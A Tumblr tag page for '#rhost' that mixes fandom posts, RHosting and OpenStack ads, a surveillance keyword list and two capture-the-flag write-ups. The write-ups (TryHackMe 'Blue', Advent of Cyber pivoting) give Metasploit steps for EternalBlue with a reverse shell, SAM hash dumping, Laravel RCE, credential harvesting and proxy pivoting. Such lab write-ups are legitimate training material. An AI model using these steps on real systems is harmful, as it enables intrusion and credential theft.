#rhost
Explore tagged Tumblr posts
Visit Tumblr Blog
Explore Tumblr blogs with no restrictions, modern design and the best experience.
Last Seen Tumblr Blogs
Fun Fact
Tumblr has a low social media market share in South America.
Text
do people ship roach and ghost and if so may i propose the ship name rhost (like pronounced like roast) (get it?) (i'm hilarious) (i don't ship them but i think i'm funny okay)
#call of duty#cod#ghost#ghost cod#simon ghost riley#roach#roach cod#gary roach sanderson#rhost#i'm hilarious#aj thinkenings
36 notes
·
View notes
Text
remember that ghost, after watching reaper get beaten and waterboarded and nearly killed, he wanted to hold her. she'd just decimated CD's head, effectively making it 2D, covered in blood and sweat, and all he wanted to do was to kiss her, care for her, and protect her.
get you a man that sees you drenched in blood and loves you even more
30 notes
·
View notes
Text
Funny sketch I made at work, I love how dead Shaggy looks on the top.
5 notes
·
View notes
Text
EX210: Red Hat OpenStack Training (CL110 & CL210)
In CL110, equips you to operate a secure, scalable RHOSP overcloud with OpenStack integration, enhancing troubleshooting skills. In CL210, gain expertise in scaling and managing Red Hat OpenStack environments, using the OpenStack Client for seamless day-to-day operations of enterprise cloud applications.
Overview of this Training | CL110 & CL210 Red Hat OpenStack Administration I | CL110 Training | KR Network Cloud
The course CL110, Red Hat OpenStack Administration I: Core Operations for Domain Operators, educates you on how to run and maintain a production-ready Red Hat OpenStack Platform (RHOSP) single-site overcloud. The skills that participants will gain include managing security privileges for the deployment of scalable cloud applications and building secure project environments for resource provisioning. Integration of OpenShift with load balancers, identity management, monitoring, proxies, and storage are all covered in the course. Participants will also improve their Day 2 operations and troubleshooting skills. Red Hat OpenStack Platform 16.1 is in keeping with this course.
Red Hat OpenStack Administration II | CL210 Training | KR Network Cloud The course CL210, Red Hat OpenStack Administration II: Day 2 Operations for Cloud Operators, is designed for service administrators, automation engineers, and cloud operators who manage Red Hat OpenStack Platform hybrid and private cloud environments. Participants in the course will learn how to scale, manage, monitor, and troubleshoot an infrastructure built on the Red Hat OpenStack Platform. The main goal is to set up metrics, policies, and architecture using the OpenStack Client command-line interface so that enterprise cloud applications can be supported and day-to-day operations run smoothly. For further information visit our Website: krnetworkcloud.org
0 notes
Text
Elevating Remote Desktop Experience with Application-Level Access: The RHosting Advantage
In the realm of remote desktop connections, where security and control are paramount, RHosting stands out by offering a distinctive advantage: the ability to grant users direct access to specific applications. This exclusive feature not only enhances security but also empowers administrators to tailor user experiences with unprecedented granularity.
Unveiling Application-Level Access
RHosting's prowess lies in its sophisticated configuration options, facilitated through its intuitive control panel. This unique feature enables administrators to align specific applications with individual users, granting them access only to designated applications on the server. But RHosting goes beyond mere application-level access; it extends granular control to folder-level restrictions as well, or even a combination of both. This level of detail ensures that users interact only with authorized applications or folders, in alignment with predetermined restrictions.
A Real-World Scenario
Consider a server with three distinct applications: a Billing Software, a Design Software, and a File Management Software. Now imagine five individuals with varying access requirements:
User 'A' needs access to the Billing Software only.
Users 'B' and 'C' require access to both the Billing and Design Software.
Users 'D' and 'E' need access only to the File Management Software.
In this scenario, the RHosting configuration panel empowers the administrator to assign each user their respective accesses, including specific folder accesses if necessary. This level of flexibility ensures that access privileges are customized according to precise organizational needs.
Enhancing Security and Control
By providing potent access management features, RHosting not only enhances security but also allows for a significant degree of control over the user experience. Administrators can enforce strict access controls, mitigating the risk of unauthorized access to sensitive data or applications. Moreover, this tailored approach promotes efficiency and effectiveness in organizational operations by ensuring that users have access only to the tools they need to perform their roles effectively.
Conclusion: A Tailored Approach to Remote Desktop Management
In a landscape where security and control are paramount, RHosting stands as a beacon of innovation with its application-level access capabilities. By offering granular control over user access, RHosting empowers organizations to customize access privileges according to their precise needs, thereby promoting efficiency, security, and peace of mind. With RHosting, organizations can elevate their remote desktop experience, knowing that their data and applications are secure and accessible only to those who need them.
0 notes
Note
answer for whomever you please: lightning, poison, parachute, and hobby
as always thank u for the ask char<3 going to do Several ocs bc haunted house so i have time to kill LMAO
oc ask meme!
lightning: who's the most impulsive character? and who is their impulse control?
oh man. probably thor or vugel? thor has No impulse control (very bad for everyone around him), vugel's impulse control is his mate, my friend ( @wolfoflyngvi )'s teostra oc, asmodeus.... though that's only Sometimes because vugel do as vugel please (unless asmo disapproves because vugel is the definition of a simp (would get very offended and launch into immediate Denial if you called him that) LMAO)
poison: vices/bad habits? what are they? how do they affect your OC?
for uriel: pretty soon after he came to stillwater, uriel took up the habit of smoking; being an angel, it doesn't TECHNICALLY affect him? but it does still make him more prone to agitation when he goes without smoking, even if it doesn't technically have any ill affect on his overall health
vul: stress-eating; due to her food anxiety, she has a tendency to eat when stressed, occasionally over-eating and making herself sick, and often indulging in mortal foods that don't actually have much (if any) nutritional value to her.
parachute: who does your OC(s) trust the most? who makes them feel safe? who would they do absolutely anything for?
uriel again bc brainrot lmao: with absolutely no contest, johnny gat; he would literally subject himself to the depths of hell (ironic innit?) for gat. johnny was the first mortal that uriel ever became close to and genuinely fond of, and through him he slowly learned to value SOME mortal life, and grew closer to other members of the saints as well---though johnny remains the one he's by far the closest to.
shang: oh man here's an oc i NEVER talk about LMFAO, my very first mh oc<3 shang is a surly, ill-tempered man who seldom trusts people, vastly preferring the company of monsters thanks to having been raised by one; the ONE person who makes him feel the most safe, that he trusts in absolute and would do anything for, is his fiancé, rhost, the admiral. despite his natural mistrust towards and aversion of hunters, he and rhost operate on nearly the same (extremely poor decision making) wavelength, with a fierce loyalty to and understanding of each other that few other people (monster or otherwise) could ever hope to have for either of them.
hobby: what do they love? what captivates them? what are their passions?
lokzii: lokzii adores gardening, cooking and making tea; though he typically assumes his mortal guise to purchase food ingredients from markets, he grows almost all of the herbal ingredients for his tea himself in a quaint, peaceful garden, nestled in a ruined courtyard that is bathed in the sapphire star's light every night. he also tends to various flowers and a few fruit-bearing plants as well.
the alatreon: here's an oc i haven't talked about here before! the alatreon's favourite hobby is... experimentation. given how it views most other beings as inferior to itself, it finds enjoyment in "experimenting" on them; this can range from simply intentionally setting up some sort of situation for one to fall into so to observe how it plays out, to testing what would happen if it injected raw dragon element directly into another being's bloodstream.
#mar.txt#answered#wing-dingy#oc tag: thor#oc tag: vugel#oc tag: uriel#oc tag: vuljud#oc tag: shang#oc tag: lokzii#oc tag: the alatreon#monster hunter#saints row
2 notes
·
View notes
Text
1* 2.6.2. 3 3B2 5.0i 5.1 5.53 7 15kg 17 20 22nd 26 50BMG 51 69 97 312 411 414 707 737 747 757 767 777 868 888 1071 1080H 1911 1984 1997 2600 3848 8182 $ & ^ ^? a ABC ACC Active ADIU advise advisors afsatcom AFSPC AHPCRC AIEWS AIMSX Aladdin Alica Alouette AMEMB Amherst AMW anarchy ANC Anonymous AOL ARC Archives Area51 argus Armani ARPA Artichoke ASIO ASIS ASLET assasinate Asset AT AT&T Atlas Audiotel Austin AVN b b9 B.D.M. Badger bank basement BATF BBE BECCA Becker beef Bess bet Beyond BfV BITNET black-bag Black-Ops Blackbird Blacklisted Blackmednet Blacknet Bletchley Blowfish Blowpipe BMDO BND Bob BOP BOSS botux BRLO Broadside Bubba bullion BVD BZ c Cable CANSLO Cap-Stun Capricorn card Case CATO CBM CBNRC CBOT CCC CCS CDA CDC CdC cdi Cell CESID CFC chaining chameleon Chan Chelsea Chicago Chobetsu chosen CIA CID CIDA CIM CIO CIS CISE Clandestine Class clone cocaine COCOT Coderpunks codes Cohiba Colonel Comirex Competitor Compsec Computer Connections Consul Consulting CONUS Cornflower Corporate Corporation COS COSMOS Counter counterintelligence Counterterrorism Covert Cowboy CQB CRA credit cryptanalysis crypto-anarchy CSE csystems CTP CTU CUD cybercash Cypherpunks d D-11 Daisy Data data data-haven DATTA DCJFTF Dead DEADBEEF debugging DefCon Defcon Defense Defensive Delta DERA DES DEVGRP DF DIA Dictionary Digicash disruption
DITSA DJC DOE Dolch domestic Domination DRA DREC DREO DSD DSS Duress DynCorp E911 e-cash E.O.D. E.T. EADA eavesdropping Echelon EDI EG&G Egret Electronic ELF Elvis Embassy Encryption encryption enigma EO EOD ESN Espionage espionage ETA eternity EUB Evaluation Event executive Exon explicit Face fangs Fax FBI FBIS FCIC FDM Fetish FINCEN finks Firewalls FIS fish fissionable FKS FLAME Flame Flashbangs FLETC Flintlock FLiR Flu FMS Force force Fort Forte fraud freedom Freeh froglegs FSB Ft. FX FXR Gamma Gap garbage Gates Gatt GCHQ GEO GEODSS GEOS Geraldton GGL GIGN Gist Global Glock GOE Goodwin Gorelick gorilla Gorizont government GPMG Gray grom Grove GRU GSA GSG-9 GSS gun Guppy H&K H.N.P. Hackers HAHO Halcon Halibut HALO Harvard hate havens HIC High Hillal HoHoCon Hollyhock Hope House HPCC HRT HTCIA humint Hutsul IACIS IB ICE ID IDEA IDF IDP illuminati imagery IMF Indigo industrial Information INFOSEC InfoSec Infowar Infrastructure Ingram INR INS Intelligence intelligence interception Internet Intiso Investigation Ionosphere IRIDF Iris IRS IS ISA ISACA ISI ISN ISS IW jack JANET Jasmine JAVA JICC jihad JITEM Juile Juiliett Keyhole keywords Kh-11 Kilderkin Kilo Kiwi KLM l0ck LABLINK Lacrosse Lebed LEETAC Leitrim Lexis-Nexis LF LLC loch lock Locks Loin Love LRTS LUK Lynch M5 M72750 M-14 M.P.R.I. Mac-10 Mace Macintosh Magazine mailbomb man Mantis market Masuda Mavricks Mayfly MCI MD2 MD4 MD5 MDA Meade Medco mega Menwith Merlin Meta-hackers MF MI5 MI6 MI-17 Middleman Military Minox MIT MITM MOD MOIS mol Mole Morwenstow Mossberg MP5k MP5K-SD MSCJ MSEE MSNBC MSW MYK NACSI NATIA National NATOA NAVWAN NAVWCWPNS NB NCCS NCSA Nerd News niche NIJ Nike NIMA ninja nitrate nkvd NOCS noise NORAD NRC NRL NRO NSA NSCT NSG NSP NSWC NTIS NTT Nuclear nuclear NVD OAU Offensive Oratory Ortega orthodox Oscor OSS OTP package Panama Park passwd Passwords Patel PBX PCS Peering PEM penrep Perl-RSA PFS PGP Phon-e phones PI picking
Pine pink Pixar PLA Planet-1 Platform Playboy plutonium POCSAG Police Porno Pornstars Posse PPP PPS president press-release Pretoria Priavacy primacord PRIME Propaganda Protection PSAC Pseudonyms Psyops PTT quiche r00t racal RAID rail Rand Rapid RCMP Reaction rebels Recce Red redheads Reflection remailers ReMOB Reno replay Retinal RFI rhost rhosts RIT RL rogue Rolm Ronco Roswell RSA RSP RUOP RX-7 S.A.I.C. S.E.T. S/Key SABC SACLANT SADF SADMS Salsa SAP SAR Sardine sardine SAS SASP SASR Satellite SBI SBIRS SBS SCIF screws Scully SDI SEAL Sears Secert secret Secure secure Security SEL SEMTEX SERT server Service SETA Sex SGC SGDN SGI SHA SHAPE Shayet-13 Shell shell SHF SIG SIGDASYS SIGDEV sigvoice siliconpimp SIN SIRC SISDE SISMI Skytel SL-1 SLI SLIP smuggle sneakers sniper snuffle SONANGOL SORO Soros SORT Speakeasy speedbump Spetznaz Sphinx spies Spoke Sponge spook Spyderco squib SRI ssa SSCI SSL stakeout Standford STARLAN Stego STEP Stephanie Steve Submarine subversives Sugar SUKLO SUN Sundevil supercomputer Surveillance SURVIAC SUSLO SVR SWAT sweep sweeping SWS Talent TDM. TDR TDYC Team Telex TELINT Templeton TEMPSET Terrorism Texas TEXTA. THAAD the Ti TIE Tie-fighter Time toad Tools top TOS Tower transfer TRD Trump TRW TSCI TSCM TUSA TWA UDT UHF UKUSA unclassified UNCPCJ Undercover Underground Unix unix UOP USACIL USAFA USCG USCODE USCOI USDOJ USP USSS UT/RUS utopia UTU UXO Uzi V veggie Verisign VHF Video Vinnell VIP Virii virtual virus VLSI VNET W3 Wackendude Wackenhutt Waihopai WANK Warfare Weekly White white Whitewater William WINGS wire Wireless words World WORM X XS4ALL Yakima Yobie York Yukon Zen zip zone ~
3 notes
·
View notes
Text
Topic Effortless Remote Desktop Access: Transforming How You Connect to Windows Servers
In today’s fast-paced business world, flexibility is key. Imagine accessing your Tally data from anywhere — whether at home, in the office, or on the go — without being tied to a specific device. Tally on Cloud makes this a reality, enabling businesses to streamline workflows, enhance collaboration, and maintain productivity like never before. With secure remote access, real-time updates, and multi-device compatibility, Tally on Cloud is transforming how businesses manage their accounting in the era of remote work.
What Is Tally on Cloud?
Tally on Cloud enables you to run Tally ERP or Tally Prime on a remote server, accessible from any device. It combines the functionality of Tally with the power of cloud technology, ensuring real-time access, robust security, and seamless workflows.
Benefits of Using Tally on Cloud
Remote Accessibility: Access Tally from any location, whether at home, in the office, or on the go.
Cost-Effective: Save on hardware and maintenance costs by shifting operations to the cloud.
Data Security: Cloud solutions come with encryption, backups, and restricted access, keeping sensitive financial data safe.
Device Independence: Work on Tally using your PC, Mac, tablet, or even a mobile device.
Improved Collaboration: Multiple users can access and work on Tally simultaneously, making teamwork effortless.
How to Make the Shift to Tally on Cloud
Moving Tally to the cloud requires the right remote desktop solution. The best tools ensure smooth connectivity, high performance, and robust security.
Look for features like:
Application-level access to limit unauthorized use.
Cross-platform compatibility to use Tally on any device.
Backup integration for data safety.
Why the Right Tool Matters
To fully leverage Tally on Cloud, you need a reliable remote desktop tool. It should support multiple users, ensure secure connections, and offer additional benefits like local printing support and granular access controls.
Experience Seamless Tally on Cloud with RHosting
If you’re looking for a hassle-free way to access Tally remotely, RHosting is your answer. It simplifies Tally on Cloud by providing:
Secure, real-time server access from anywhere.
Granular user permissions for enhanced control.
Integrated backups with Google Drive to safeguard your data.
Cross-device compatibility for uninterrupted workflows.
RHosting is designed to make remote access easy, secure, and efficient. Whether you’re managing finances on Tally or collaborating with your team, it’s the perfect solution for modern businesses.
Experience seamless Tally on Cloud access with RHosting and elevate your remote workflows today.
0 notes
Text
Once LMHOST is set and RHOST is set then execute the exploit command to deliver the payload.
0 notes
Text
First post! | Tryhackme #1 "Blue". | EternalBlue
Hello friends, for my first writeup I have decided to complete the "Blue" room from Tryhackme.
This room covers basic reconnaissance and compromising a Windows 7 machine that is vulnerable to Eternalblue (MS17-010 / CVE-2017-0144). Eternalblue is a vulnerability in Microsofts implementation of Server Message Block (SMB) version 1, the exploit utilises a buffer overflow to allow the execution of remote code.
To begin with we will perform a scan of the machine to get an idea of what ports are open and also the target OS.
We know the machines IP is 10.10.7.17 which is all the information we have to work off, with the exception of information provided by the lab.
We will start with a Nmap scan using the following command "sudo nmap 10.10.7.17 -A -sC -sV", the break down of this command is as follows; -A specifies OS detection, version detection, script scanning, and traceroute which provides us more information from the scan. -sC runs default scripts from nmap which can give us more insight depending on the scripts that run. -sV will provide us the version numbers of any software running on the port which is important for us, as we may be able to identify vulnerable versions of software and get an idea of how frequently the device is updated and maintained.
Our scan has come back and we can see the target device is running Windows 7 Professional service pack 1 (which means it should be vulnerable to Eternalblue which we will confirm shortly) we also get a lot more information about the target.
From our initial scan we now have the following information;
Operating system and version (Win 7 Pro SP1) Hostname is Jon-PC Device is in a workgroup and not a domain Ports 135,139,445,3389 are open.
Of interest to us currently is ports 445 and 3389. 445 is SMB which is what Eternalblue targets and 3389 which is Remote Desktop Protocol which allows remote connection and control on a Windows device.
With this being an easy room with a known exploit lets move on to gaining access to the machine, first we will start up Metasploit which is a framework that contains modules which we can use to interact with and eventually gain control of our target device using.
Metasploit has a built in search function, using this I have searched for Eternalblue and loaded the first result (exploit/windows/smb/ms17_010_eternalblue).
With the exploit selected I now open up the options for the payload and module and configure the following;
RHOSTS (remote host / target) RPORT (remote port, automatically filled with 445 as this is an SMB exploit) VERIFY_TARGET (doesn`t need to be configured but by default it is enabled, this will check if the target is vulnerable before commiting the exploit) LPORT (local port to use on my machine) LHOST (local address or interface) in my case I will set this to the tun0 interface on my machine as I am connected over a VPN, as identified by running "ifconfig".
The only change I make is to set the payload to payload/windows/shell_reverse_tcp to provide a non-meterpreter reverse shell as I find this gives me better results.
With these set we run the exploit and after less than a minute I get a success message and a reverse shell, as we can see our terminal is now displaying "C:\Windows\system32" and running a "whoami" command it returns "nt authority\system".
We now have a reverse shell on the target with the highest permissions possible as we are running as the system, from here we can move around the system and gather the "flags" for the lab and complete the rest of the questions so lets do that!
First of we need to upgrade our shell to a meterpreter shell, we will background our current shell with ctrl+z and make a note of the session number which is 6 (we`ll need this later).
To upgrade our shell we will need another module from metasploit, in this case a "post" module. These are post exploitation modules to help with various tasks, in our case we want to upgrade our regular reverse shell to a meterpreter shell which will provide us more options, some are shown below to give you an idea!
The module for this is post/multi/manage/shell_to_meterpreter
The only option we need to set is the session number of our existing shell, which was 6, once we run this we can confirm that our meterpreter shell is now created by running "sessions" which will list our current sessions.
From here we can run "sessions -i 7" to swap to session 7 in our terminal. Now we are in our meterpreter shell, we can use "help" to list what extra commands we have, but more importantly we need to migrate our shell to a stable process with system privileges still. We will list all running proccesses using the "ps" command, identify a process such as "spoolsv.exe". We will migrate to this using its Process ID, so we will enter "migrate 1224" to migrate to this process.
Next we need to dump the SAM database which will provide us all the hashed passwords on the computer so we can crack them.
We will use the convenient command "hashdump" from our meterpreter shell to achieve this for us, this provides us the following password hashes;
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
The question wants us to crack the password for Jon, for ease of use and to keep this writeup on the short side we will use crackstation.net, we take the last part of the Jon hash "ffb43f0de35be4d9917ac0cc8ad57f8d" and enter it into the website, this will match the hash against a database as this is a weak password.
We could have used Hashcat or John the Ripper to crack the password, which we will do in the future as this website can only manage a few hash types.
The final step is finding the flags to complete the lab so we will hunt these down, however with this being a writeup I will obfuscate the flags.
The first is at C:\ and is "flag{********_the_machine}".
The second is where the SAM database resides C:\Windows\system32\config and is "flag{*******_database_elevated_access}".
The third is a good place to check for valuable information, which is user directorieis especially if they hold a technical position or a elevated position at the target site. The flag is located in C:\Users\Jon\Documents and is "flag{admin_****_can_be_valuable}".
I hope you found this helpful or interesting at least! I aim to upload writeups slowly as I get myself back into the swing of things again!
Until next time
Lilith
1 note
·
View note
Text
On the sidelines of a Character Convocation some months back
[Wherein we find Gilly from Goober and the Ghost Chasers and Norville "Shaggy" Rogers from the Scooby-Doo franchise in conversation over sandwiches and iced tea by and large. Let's listen in--] NORVILLE "SHAGGY" ROGERS, with his usual hippie exuberance: Like, Gilly, I assume you know just how much Scoob and I can manage to go through whole meals, and then some--and man, can we get STUFFED rather quickly! GILLY: Meanwhile, Shag ... I assume you know that our dog Goober has this habit of disappearing whenever he suspects the appearance of ghosts or other spectral objects ... and I mean DISAPPEARING outright! But still, he manages to come back when the ghost passes some distance away! NORVILLE "SHAGGY" ROGERS: Yet even then, Scoob can go off in the distance when something suspicious is detected ... and boy, can he manage to turn up evidence as unmasks many a "ghost"! GILLY: On the other hand, I assume you've heard of some ghost photography such as I've been known to do with cheap infrared film, capturing actual ghosts in the bargain! SCOOBY-DOO, somewhat taken in by this: Reah! Rhosts!
#hanna barbera#vignette#unlikely conversation#character convocation#on the sidelines#shaggy and scooby#gilly (goober and the ghost chasers)#large appetites#ghost photography#hannabarberaforever
0 notes
Text
RHosting distinguishes itself from the competition with one of its most prominent features - the ability to manage concurrent printing commands. While other products are tethered to a singular print spooler operation, RHosting creates a direct conduit to local printers and proficiently coordinates print commands across multiple spoolers. This avant-garde approach eradicates the need for complex internal print queuing systems, fostering improved speed and operational efficiency.
#advancedprinting #access
0 notes
Text
Advent of cyber day 9 pivoting
Advent of cyber 2022
Day 9 pivoting
Deploy the attached VM, and wait a few minutes. What ports are open?
Run a quick nmap scan
nmap -sV -sC -F 10.10.98.22
-sV: Probe open ports to determine service/version info
-sC: A simple script scan using the default set of scripts
-F fast scan
80
What framework is the web application developed with?
This info is at the bottom of the webpage
laravel
What CVE is the application vulnerable to?
in metasploit its in the info section for the exploit
CVE-2021-3129
What command can be used to upgrade the last opened session to a Meterpreter session?
sessions -u -1
What file indicates a session has been opened within a Docker container?
/.dockerenv
What file often contains useful credentials for web applications?
.env
What database table contains useful credentials?
users
What is Santa's password?
p4$$w0rd
What ports are open on the host machine?
What is the root flag?
Pivot! steps
Launch Metasploit
msfconsole
search laraval
Matching Modules
# Name Disclosure Date Rank Check Description
---- --------------- ---- ----- ----------- 0 exploit/unix/http/laravel_token_unserialize_exec 2018-08-07 excellent Yes PHP Laravel Framework token Unserialize Remote Command Execution 1 exploit/multi/php/ignition_laravel_debug_rce 2021-01-13 excellent Yes Unauthenticated remote code execution in Ignition
info 1
Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
use 1
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set RHOSTS 10.10.98.22
RHOSTS => 10.10.98.22
Check
[] Checking component version to 10.10.98.22:80 [] 10.10.98.22:80 - The target appears to be vulnerable.
To summarise all thats happened so far is after a little enumeration with nmap and looking at the website, we know port 80 is open and the website is made using laravel.
Next we launch Metasploit look for any laravel exploits, check they are suitable then launch them.
show targets
This shows what targets are suitable for this exploit.
Set LHOST 10.10.94.167
ip a will tell you your ip address
run
Command shell session 1 opened (10.10.94.167:4444 -> 10.10.98.22:50682) at 2022-12-14 11:22:47 +0000
whoami
www-data
We have a shell! what we need now is to upgrade it to meterpeter so
background
sessions
Active sessions
Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell cmd/unix 10.10.94.167:4444 -> 10.10.98.22:50682 (10.10. 98.22)
sessions -u -1 this upgrades the shell to a meterpeter shell
then to use it sessions -i 2 -i means interact
we now have our meterpeter shell, time to make a native shell
shell
env Show the environment
USER=www-data HOME=/var/www PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin LANG=C PWD=/var/www/html
cd /var/www ls -la
ls -la Long format list (permissions, ownership, size, and modification date) of all files:
total 324 drwxr-xr-x 1 www-data www-data 4096 Sep 13 19:39 . drwxr-xr-x 1 root root 4096 Sep 13 09:45 .. -rw-r--r-- 1 503 staff 868 Sep 12 17:08 .env drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 app -rwxr-xr-x 1 www-data www-data 1686 Sep 11 00:44 artisan drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:59 bootstrap -rw-r--r-- 1 www-data www-data 1613 Sep 11 00:44 composer.json -rw-r--r-- 1 www-data www-data 247888 Sep 11 01:01 composer.lock drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 config drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 database drwxr-xr-x 2 www-data www-data 4096 Sep 13 16:55 html -rw-r--r-- 1 www-data www-data 944 Sep 11 00:44 package.json drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 resources drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:55 routes -rw-r--r-- 1 www-data www-data 563 Sep 11 00:44 server.php drwxr-xr-x 1 www-data www-data 4096 Sep 13 16:59 storage drwxr-xr-x 1 www-data www-data 4096 Sep 13 17:04 vendor -rw-r--r-- 1 www-data www-data 559 Sep 11 01:14 webpack.mix.js
weve been told the .env file in docker containers have all the good stuff so
cat .env
APP_NAME=Laravel APP_ENV=local APP_KEY=base64:NEMESCXelEv2iYzbgq3N30b9IAnXzQmR7LnSzt70rso= APP_DEBUG=true APP_URL=http://localhost
LOG_CHANNEL=stack LOG_LEVEL=debug
this is what we want
DB_CONNECTION=pgsql DB_HOST=webservice_database DB_PORT=5432 DB_DATABASE=postgres DB_USERNAME=postgres DB_PASSWORD=postgres
BROADCAST_DRIVER=log CACHE_DRIVER=file QUEUE_CONNECTION=sync SESSION_DRIVER=file SESSION_LIFETIME=120
REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379
MAIL_MAILER=smtp MAIL_HOST=smtp.mailtrap.io MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null MAIL_FROM_ADDRESS=null MAIL_FROM_NAME="${APP_NAME}"
AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=us-east-1 AWS_BUCKET=
PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}" MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
useful info: location of the database - webservice_database password:postgres username:postgres
we need to find out where webservice_database is. To do this
exit to get back to meterperter
resolve webservice_database
Host resolutions
Hostname IP Address -------- ---------- webservice_database 172.28.101.51
create a shell shell This shell doesn’t have much usability, however we are given the info that 172.17.0.1 is a very likely address for the the machine controlling the docker containers. Now the two ip adresses that we have can only be accessed from within the docker container
at this point its worth noting that you can upload tools, such as nmap onto this container to then use. but this is inefficient and prone to failure.
This is where we PIVOT, as in route the traffic from our machine through RHOST
Exit back to meterpreter then background it
Now we need to set up our port forwarding or pivoting in metasploit using the route command
route -h shows all the options
route add 172.28.101.51/32 2
/32 is the subnet for a single ip address - i need to look into subnets the 2 on the end is for session 2 which is our meterpreter shell (which is the initial session) and
route add 172.17.0.1/32 2
so both of these connections will be routed through our original host
route print lets us check all is well
time to access the database
search postgres
we will use schemadump
use 16
msf6 auxiliary(scanner/postgres/postgres_schemadump) > set RHOSTS 172.28.101.51
run
DBName: postgres Tables:
TableName: users_id_seq Columns:
ColumnName: last_value ColumnType: int8 ColumnLength: '8'
ColumnName: log_cnt ColumnType: int8 ColumnLength: '8'
ColumnName: is_called ColumnType: bool ColumnLength: '1'
TableName: users Columns:
ColumnName: id ColumnType: int4 ColumnLength: '4'
ColumnName: username ColumnType: varchar ColumnLength: "-1"
ColumnName: password ColumnType: varchar ColumnLength: "-1"
ColumnName: created_at ColumnType: timestamp ColumnLength: '8'
ColumnName: deleted_at ColumnType: timestamp ColumnLength: '8'
TableName: users_pkey Columns:
ColumnName: id ColumnType: int4 ColumnLength: '4'
now we need to look at the table and pull info off it.
search postgres
the server generic query exploits look promising.
use 11
info
set RHOSTS
set DATABASE postgres this is from the info we've enumerated so far
set SQL “select * from users” this ask to retrieve all information from the users table
run
id username password created_at deleted_at -- -------- -------- ---------- ---------- 1 santa p4$$w0rd 2022-09-13 19:39:51.669279 NIL
We have some credentials time to get to the host, we need to set up a socks proxy to route all traffic through our ‘johnny’so
search socks use 0
msf6 auxiliary(server/socks_proxy) >
make a note of the port being used (1080)
msf6 auxiliary(server/socks_proxy) > run
jobs - checks its running
new tab, metasploit should now be running traffic from kali through the proxy we set up,
curl —proxy socks5://127.0.0.1:1080 http://172.17.0.1
curl: Transfers data from or to a server. Supports most protocols, including HTTP, FTP, and POP3.
this works
now to use proxychains
(vim wasnt working so i used nano)
nano /etc/proxychains4.conf
scroll to the bottom, like when using this previously, set it to socks5 and set port to 1080, now all traffic should route through what we set up in meterpreter.
we can now use proxychains, but the when using nmap have to turn of ping to get it to work.
proxychains nmap -F -sV -sT -Pn 172.17.0.1
this went down and i lost my shell, as this is my third attempt, i’m adding what the video shows from now as i gotta go.
nmap shows ports 22 and 80 open
I’ve redone this and got it working without crashing
port 22 is an ssh port so using metasploit
search ssh_login
use 0
set RHOST 172.17.01 PASSWORD p4$$w0rd USER santa
run
then when this completes,
sessions
we can see there is a new session 3
sessions -i 3
ls
this shows us flag.txt
cat flag.txt
we have our flag
0 notes
Note
Wat reality TV show would you like the avengers to take part in? I think they wud be amazing in I'm a celebrity get me out of HERE, but I also think a baking/Cooking competition show wud be quite funny. Tony-"baking is just science!! WHY IS IT NOT WORKING!!?! Boil damn you!" whil Steve is in the corner using chocolate and cream to sketch tonys face into the side of his burnt soufflé,
OOO I love this….
I forever want them in the most domestic situations so PLEASE give me 2000s era Real World: Avengers Tower.
Or Big Brother: Avengers, and make them form alliances slowly but surely, and Steve and Tony would start out not getting along, but would slowly but surely realize they work super well together, form an alliance, and then panic when they realize they have ~*developed feelings*~ and therefore never want the other to get voted out?
BUT you are also right, and any kind of baking/cooking show would be amazing, but it would have to be like Nailed It, on Netflix, and Tony thinking Steve is too good to be on a disaster show, and why are his cookies FLAT, why is his cake LEAKING, why does everything Steve make look like a work of art?? He wants to throw flour at him but also kiss his face!!!
#Real Housewives: AVENGERS#RHOST#don't even get me started on a Bachelor AU where tony is the bachelor and decides he loves steve on week one and the rest is alllll pretend#or well#more pretend than usual ykwim#anonymous#this question has so many possibilities.....
22 notes
·
View notes
Text
Revolutionizing Printing Solutions with RHosting: Efficiency Meets Convenience
In today's fast-paced business environment, the need for efficient and seamless printing solutions has never been greater. Enter RHosting, the pinnacle of printing solutions that revolutionizes the way users interact with local printers. With its state-of-the-art technology and unparalleled features, RHosting promises a printing experience like no other.
At the core of RHosting's appeal is its ability to seamlessly connect your server to a multitude of local printers, regardless of their make or model. Whether it's a Laserjet, Barcode, POS, or any other type, RHosting ensures that users can effortlessly send print commands to their desired printer, accommodating a wide range of paper sizes with ease.
What sets RHosting apart from its competitors is its unique approach to managing concurrent printing commands. While other products may struggle with a singular print spooler operation, RHosting excels in efficiently coordinating print commands across multiple spoolers. This forward-thinking approach eliminates the need for complex internal print queuing systems, resulting in improved speed and operational efficiency.
But perhaps the most significant distinction lies in RHosting's capacity to handle a variety of printers simultaneously, each with its own set of paper sizes. This capability ensures that remote users can print anything, anywhere, while still enjoying a seamless and local printing experience.
Gone are the days of sluggish printing processes and frustrating bottlenecks. With RHosting, multiple users can flawlessly print on diverse printer types simultaneously, leading to a smooth workflow, optimized productivity, and an unparalleled printing experience. Say goodbye to traditional systems and embrace the revolution in printing with RHosting, where efficiency meets convenience in a harmonious symphony of streamlined operations.
